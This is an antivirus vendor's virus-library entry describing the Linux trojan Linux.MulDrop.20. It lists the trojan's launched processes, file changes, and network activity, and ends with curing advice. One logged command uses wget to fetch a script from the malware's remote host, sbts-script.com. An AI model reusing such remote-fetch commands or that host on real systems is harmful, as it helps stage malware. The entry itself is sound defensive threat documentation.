マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Linux.MulDrop.20

Added to the Dr.Web virus database: 2017-11-12

Virus description added:

Technical Information

Malicious functions:
Launches itself as a daemon
Performs process tracing:
  • <SAMPLE>
  • <SAMPLE_FULL_PATH>
Launches processes:
  • /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/bash <SAMPLE_FULL_PATH> -c
  • wget http://sbts-script.com//rectussc/dosyalar/sinusbotverison.php -q -O -
  • ip addr
  • tail -n1
  • grep state UP -A2
  • cut -f1 -d/
  • awk {print $2}
  • wget /rectussc/dosyalar/sbguncelle.php -q -O -
  • grep -c ok installed
  • dpkg-query -W -f=${Status} curl
  • apt-get -y install curl
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/bin/dpkg --assert-multi-arch
  • /bin/sh -c /usr/bin/apt-listchanges --apt || test $? -ne 10
  • /usr/bin/apt-listchanges --apt
  • /bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true
  • /usr/sbin/dpkg-preconfigure --apt
  • locale charmap
  • sh -c stty -a 2>/dev/null
  • stty -a
  • /usr/bin/dpkg --status-fd 17 --unpack --auto-deconfigure /var/cache/apt/archives/libcurl3_7.38.0-4+deb8u5_amd64.deb /var/cache/apt/archives/curl_7.38.0-4+deb8u5_amd64.deb
Kills the following processes:
  • <SAMPLE>
  • <SAMPLE_FULL_PATH>
  • /usr/lib/apt/methods/http
Performs operations with the file system:
Modifies file access rights:
  • /var/log/apt/term.log
  • /var/log/apt/history.log
Creates or modifies files:
  • /var/lib/dpkg/lock
  • /var/cache/apt/archives/lock
  • /var/cache/apt/archives/partial/libcurl3_7.38.0-4+deb8u5_amd64.deb
  • /var/cache/apt/archives/partial/curl_7.38.0-4+deb8u5_amd64.deb
  • /var/lib/apt/listchanges.db
  • /var/log/apt/term.log
  • /var/log/apt/history.log
Locks files:
  • /var/cache/debconf/config.dat
  • /var/cache/debconf/passwords.dat
  • /var/cache/debconf/templates.dat
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
HTTP GET requests:
  • sb#########.###//rectussc/dosyalar/sinusbotverison.php
  • ft#.##.######.#######ian/pool/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_amd64.deb
  • ft#.##.######.######bian/pool/main/c/curl/curl_7.38.0-4%2bdeb8u5_amd64.deb
DNS ASK:
  • sb###script.com
  • ft#.##.debian.org
Other:
Collects CPU information
Collects RAM information

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number